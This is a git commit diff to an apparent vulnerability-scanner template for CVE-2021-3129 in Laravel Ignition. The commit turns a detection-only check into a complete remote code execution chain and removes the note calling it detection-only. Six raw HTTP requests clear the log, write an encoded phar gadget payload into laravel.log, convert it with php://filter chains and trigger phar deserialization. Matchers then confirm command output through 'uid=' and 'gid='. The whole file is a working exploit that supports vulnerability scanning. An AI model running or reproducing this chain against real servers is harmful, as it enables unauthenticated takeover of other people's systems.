Added complete RCE chain

2021-07-10 13:42:09 +05:30 · 2021-07-10 13:42:09 +05:30 · c2f87a94c6
parent 6688aaca61
commit c2f87a94c6
1 changed files with 77 additions and 7 deletions
--- a/cves/2021/CVE-2021-3129.yaml
+++ b/cves/2021/CVE-2021-3129.yaml
@ -1,15 +1,15 @@
 id: CVE-2021-3129

 info:
-  name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
-  author: z3bd
+  name: Laravel <= v8.4.2 Debug Mode - Remote Code Execution
+  author: z3bd,pdteam
  severity: critical
  description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
-  reference: https://www.ambionics.io/blog/laravel-debug-rce
+  reference: |
+        - https://www.ambionics.io/blog/laravel-debug-rce
+        - https://github.com/vulhub/vulhub/tree/master/laravel/CVE-2021-3129
  tags: cve,cve2021,laravel,rce

-  # Note:- This is detection template, use the referenced article for detailed exploit.
-
 requests:
  - raw:
      - |
@ -21,9 +21,79 @@ requests:
        Content-Length: 144
        Content-Type: application/json

-        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}}
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}

+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: deflate
+        Accept: application/json
+        Connection: close
+        Content-Length: 144
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: deflate
+        Accept: application/json
+        Connection: close
+        Content-Length: 144
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
+
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: deflate
+        Accept: application/json
+        Connection: close
+        Content-Length: 144
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
+
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: deflate
+        Accept: application/json
+        Connection: close
+        Content-Length: 144
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
+
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: deflate
+        Accept: application/json
+        Connection: close
+        Content-Length: 144
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
+
+    matchers-condition: and
    matchers:
+      - type: status
+        status:
+          - 500
+
      - type: word
        words:
-          - "failed to open stream: Permission denied"
+          - "uid="
+          - "gid="
+          - "groups="
+          - "Illuminate"
+        part: body
+        condition: and
+
+    extractors:
+      - type: regex
+        regex:
+          - "(u|g)id=.*"